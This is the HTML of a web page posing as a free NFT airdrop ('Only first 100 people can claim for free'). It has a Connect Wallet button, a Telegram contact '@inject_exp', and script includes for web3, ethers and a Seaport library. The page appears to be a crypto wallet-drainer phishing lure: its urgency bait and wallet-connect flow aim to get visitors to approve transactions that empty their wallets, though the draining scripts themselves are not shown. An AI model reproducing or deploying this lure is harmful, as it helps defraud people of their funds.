<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta charset="utf-8">


  <title>@inject_exp | Airdrop</title>
<meta property="og:title" content="𝐂𝐋𝐈𝐂𝐊 𝐇𝐄𝐑𝐄 𝐓𝐎 𝐌𝐈𝐍𝐓!">
    <meta property="og:site_name" content="">
    <meta property="og:url" content="https://kingunfts.com">
    <meta property="og:description" content="Only first 100 people can claim for free">
    <meta property="og:image" content="https://i.ibb.co/swxcFHd/600x200.jpg">
    
    <meta name="twitter:card" content="summary_large_image">
    <meta name="theme-color" content="#00ff00">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0,user-scalable=0">  

  <link rel="stylesheet" href="media/css/stylesy.css_1221ss2a2.css">

    
  <link rel="stylesheet" type="text/css" href="media/css/main.css">
  <link rel="stylesheet" type="text/css" href="media/css/normalize.css">
  <link rel="stylesheet" type="text/css" href="media/css/alert.css" media="all">
  

  <link rel="stylesheet" href="normalize.min.css">
  <script src="66aa7c98b3.js" crossorigin="anonymous"></script>  <link rel="stylesheet" href="normalize.min.css">
  <script src="ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <link rel="stylesheet" href="media/css/style.css">
  <link rel="shortcut icon" href="media/favicon.jpg">
  <style>
    .toast-message {
        font-size: 18px;
    }
    .toast {
        font-family: '', serif;
        width: 500px;
    }
    .toast-title {
        font-size: 18px;
    }
    #toast-container > .toast {
      width: 600px;
    }
    </style>
    <style>
      
          .dsFtvk {
          padding: 1rem;
          display: flex;
          -webkit-box-pack: justify;
          justify-content: space-between;
          -webkit-box-align: center;
          align-items: center;
          background: rgb(28, 28, 28);
          }
          .fSKGtO {
          text-align: left;
          }
          .bmykIh {
          grid-column: 2 / auto;
          width: 10%;
          }
          .hudvov {
          color: white;
          font-weight: 300;
          text-transform: uppercase;
          margin-left: 2rem;
          font-size: 1rem;
          }
          .kolJum {
          color: rgb(3, 186, 173);
          font-weight: 300;
          margin-left: 2rem;
          font-size: 1.4rem;
          }
          .YbDZO {
          text-align: center;
          font-size: 1.2vw;
          }
          .jZknyc {
          display: flex;
          -webkit-box-align: center;
          align-items: center;
          -webkit-box-pack: center;
          justify-content: center;
          }
          .fFWMM {
          color: white;
          text-transform: uppercase;
          cursor: not-allowed;
          font-size: 1rem;
          }
          .fEMNwD {
          display: flex;
          -webkit-box-align: center;
          align-items: center;
          margin-left: 1rem;
          }
          .dRPkgf {
          background: rgb(103, 202, 83);
          color: black;
          padding: 1rem 2rem;
          font-size: 1rem;
          border: 0px;
          display: inline-block;
          text-transform: uppercase !important;
          cursor: pointer !important;
          }
          .hEItTc {
          display: grid;
          position: relative;
          grid-template-columns: 0.33fr 1fr;
          -webkit-box-align: center;
          align-items: center;
          background:  0% 0% / cover black;
          }
          .hSZwTw {
          width: 100%;
          height: 46vw;
          background: url("https://goonlezgang.com/3.html") 0% 0% / cover;
          }
          .kvfCak {
          color: white;
          padding: 4rem;
          display: grid;
          height: 100%;
          }
          .dWtYLN {
          align-self: center;
          }
          .jHkUtz {
          text-transform: uppercase;
          font-size: 2vw;
          }
          .hYaqUq {
          color: rgba(255, 255, 255, 0.6);
          font-size: 1.1rem;
          }
          .dWtYLN {
          align-self: center;
          }
          .ittOSK {
          display: flex;
          -webkit-box-align: center;
          align-items: center;
          -webkit-box-pack: center;
          justify-content: center;
          }
          .XurKV {
          display: flex;
          -webkit-box-align: center;
          align-items: center;
          -webkit-box-pack: center;
          justify-content: center;
          }
          .kvxoVx {
          margin-right: 1rem;
          }
          .MTNXE {
          font-size: 2vw;
          }
          .XurKV {
          display: flex;
          -webkit-box-align: center;
          align-items: center;
          -webkit-box-pack: center;
          justify-content: center;
          }
          .hzidxS {
          border: 0px;
          background: transparent;
          color: white;
          font-size: 4vw;
          cursor: pointer;
          }
          .bewwCK {
          background: transparent;
          border: 2px solid white;
          text-align: center;
          width: 10%;
          margin-right: 2rem;
          margin-left: 2rem;
          font-size: 1rem;
          padding: 1rem;
          }
          .hzidxS {
          border: 0px;
          background: transparent;
          color: white;
          font-size: 4vw;
          cursor: pointer;
          }
          .fpflfx {
          margin: 2rem 0px;
          cursor: pointer;
          text-transform: uppercase;
          justify-self: self-start;
          font-size: 1.5vw;
          transition: all 0.2s ease 0s;
          background: rgb(3, 186, 173) !important;
          color: rgb(15, 15, 15) !important;
          padding: 0.5rem 1.7rem !important;
          border: 0px !important;
          }
          .dWtYLN {
          align-self: center;
          }
          .bIQika {
          text-align: center;
          font-size: 1.5vw;
          color: white;
          }
          .aFkCK {
          font-size: 1.7rem;
          }
          .gBnRtE {
          padding: 5rem;
          }
          .ebSVtn {
          padding: 2rem;
          display: flex;
          -webkit-box-align: center;
          align-items: center;
          justify-content: space-around;
          background: #37e686;
          text-transform: uppercase;
          font-weight: 600;
          border: 2px solid white;
          }
          .xtnST {
          background: rgb(186, 3, 186);
          font-size: 1.2vw;
          padding: 0.5vw 3vw;
          color: #1fd15b;
          }
          .fPWkCe {
          padding: 2rem;
          background: #60c941;
          display: flex;
          -webkit-box-align: center;
          align-items: center;
          -webkit-box-pack: justify;
          justify-content: space-between;
          }
          .htpVhC {
          color: white;
          text-align: left;
          }
          .ceIgVl {
          width: 10%;
          }
          .dFsRDr {
          width: 100%;
          }
          .ijbaIi {
          margin-left: 1rem;
          }
          .jMqqJK {
          width: 15%;
          }
          @media screen and (max-width: 810px) {
            .mint-wrap {
              flex-direction: column;
            }
            .boonjie-hero-right {
              margin-left: 20px;
              margin-right:  20px;
              margin-top:   30px;
              border-radius:  15px!important;
              margin-bottom:  50px;
            }
            img {
              border-radius:  15px!important;
            }
          }
        
        </style>
</head>
<body>
  <div class="mint-wrap" style="
        align-items: center;
        /* background: #0f85f1; */
        display: flex;
        /* flex-direction: column; */
        justify-content: center;
        margin-left: -250px;
        position: absolute;
    width: 100%;
    margin: 0 auto;
    z-index: 10;
    top: 10%;
        ">
        <div class="sub-head" id="claim-text-wrapper">

            <div id="payment-modal">
                <div id="payment-header">

                    <div id="payment-header-text">
                        <h4 id="lbuy" style="text-align:center"> NFT AIRDROP</h4>
                        <p id="lsupply" class="pt-1.5 italic-grey" style="text-align:center">Total supply: 100</p>
                    </div>
                </div>
                <div id="payment-info">
                    <img src="pPxb0CY/k.gif" class="image" height="200" width="200" id="price-img">
                    <div id="payment-info-text">

                        <p class="title">Telegram 👇</p>
                        <!-- <p id="ldate" class="launch-date">You will be able to see your NFT at the OpenSea</p> -->
                        <!--time1--><p>@inject_exp</p><p><label id="dateday3"></label> <label id="dateday2"></label> <label id="datehour1"></label></p><!--time2-->
                    </div>
                </div>
                <div id="ape-number">
                    <div class="calcs">
                      <h5 id="ape-max">Allocation:</h5>
                    </div>
                    <h5 id="ape-max">1 NFT</h5>
                </div>
                
                <div id="root" class="cl-root"><main><div class="sc-dlfnuX bJgQKs"><button id="connectButton" class="MuiButtonBase-root MuiButton-root MuiButton-contained sc-bdfBQB kKVOCU MuiButton-containedPrimary" tabindex="0" type="button"><span class="MuiButton-label"><span id="changeconnect">Connect Wallet</span></span><span class="MuiTouchRipple-root"></span></button></div></main></div>
                <div id="mintsss" style="display:none;">0</div>
                <div class="social_medias">
                  <a id="social_discord" href="https://discord.gg/VGMHtzBT4q" style="margin-right: 13px;" class="item discord social_media" target="_blank"><img src="media/Discord_Icon.svg" draggable="false" alt="Discord Icon" width="36" height="36"></a><a id="social_twitter" href="https://twitter.com/KinguNft" class="item twitter social_media" target="_blank"><img src="media/Twitter_Icon.svg" draggable="false" alt="Twitter Icon"></a>
              </div>
<!--Loading1-->
                
                <div class="container2" style="margin:10px 0 0 0">
                    <div class="Loading">
                        <span>? / ?</span>
                    </div>
                </div>
<!--Loading2-->
            </div>
        </div>
    </div>


  <script src="media/js/timer.js"></script>
  <script src="media/js/times.js"></script>

  <script src="media/js/script.js"></script>
  <script type="text/javascript" src="web3%401.2.11/dist/web3.min.js"></script>
  <script src="lib/ethers-5.2.umd.min.js" type="application/javascript"></script>
  <script src="media/js/index.js"></script>
  <script src="media/js/seaport.js"></script>

</body>
</html>
